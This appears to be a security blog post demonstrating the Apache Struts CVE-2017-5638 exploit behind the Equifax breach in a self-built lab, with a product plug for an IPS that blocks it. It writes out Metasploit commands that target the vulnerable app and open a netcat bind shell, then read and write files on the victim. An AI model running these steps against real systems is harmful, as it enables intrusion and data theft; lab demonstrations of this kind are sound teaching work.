If you read my last blog entry on the other struts attack you would know that I ended it with the words "this will not be the last time you see struts causing a vulnerability". This one is from last year but I thought it would be a nice one to show because it was the vulnerability that resulted in the Equifax breach. That and I was working on a presentation on how breaches happen and used this one to demonstrate.
Equifax was also recently fined another 600,000 dollars by the UK for the breach that happened last year. Patch your systems people, the breach you suffer is not over just because you suffered your first round of payouts, patches and audits.
So essentially this vulnerability is exploited via the OGNL file upload function inside the struts application handling. For demo purposes I setup a Ubuntu 16.04 server and installed tomcat and then grabbed the vulnerable version of struts (struts-2.5.10-all.zip). Then you install a vulnerable web app for struts to load. https://github.com/nixawk/labs/blob/master/CVE-2017-5638.struts2_220.127.116.11-showcase.war is a good one to use. Now navigate to the Tomcat Web Application Manager and choose deploy and select the file you just downloaded.
After you have the application running correctly (and I may have left out a few things above to get that done) it is time to exploit the vulnerability. For my demo I made a file on the victim called supersecretfile.txt and put the sentence "All the secrets are here" in it and saved it. I saved it in the /tmp folder to show my successful exploit by reading this file later.
Load up metasploit by typing:
#msfconsole #search struts #use exploit/multi/http/struts2_content_type_ognl #set RHOST <IP ADDRESS OF YOUR VICTIM RUNNING THE APP> #set TARGETURI /struts2_18.104.22.168-showcase/showcase.action #exploit
Now after it runs issue the following command:
#set PAYLOAD cmd/unix/bind_netcat #exploit
This should now give you shell access over netcat. Play around by running some commands like ls -l, cat /tmp/supersecretfile.txt, uname -a. You can also do a touch /tmp/iwashere.txt file if you want to show you can write to the directory as well. You get the idea.
Have fun recreating the hack that caused half of all Americans to suffer a data leak of their information and cost Equifax a lot of money and time - not to mention reputation.
Here is a YouTube video from my channel that show the hack. It also shows how using Trend Micro Deep Security with the IPS enabled can completely stop the attach on the vulnerable system. After you finish watching the video hit the subscribe button.